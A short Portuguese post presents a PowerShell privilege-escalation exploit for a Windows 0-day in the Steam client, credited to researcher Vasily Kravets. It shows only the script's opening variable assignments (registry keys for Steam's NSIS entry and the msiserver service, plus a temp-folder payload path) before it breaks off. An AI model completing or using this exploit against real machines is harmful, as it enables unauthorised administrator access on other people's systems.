Exploit: Escalação de Privilégios na Steam
A plataforma de jogos Steam, desenvolvida pela empresa Valve, apresenta uma vulnerabilidade de 0-day na versão para Windows. A falha, que se tornou pública pelo pesquisador Vasily Kravets, permite que qualquer usuário execute código arbitrário com privilégios de administrador. O exploit foi desenvolvido em PowerShell. $SteamRegKey = “HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS” $MSIRegKey = “HKLM:\SYSTEM\CurrentControlSet\Services\msiserver” $RegDir = “C:\Windows\Temp\RegLN.exe” $PayDir …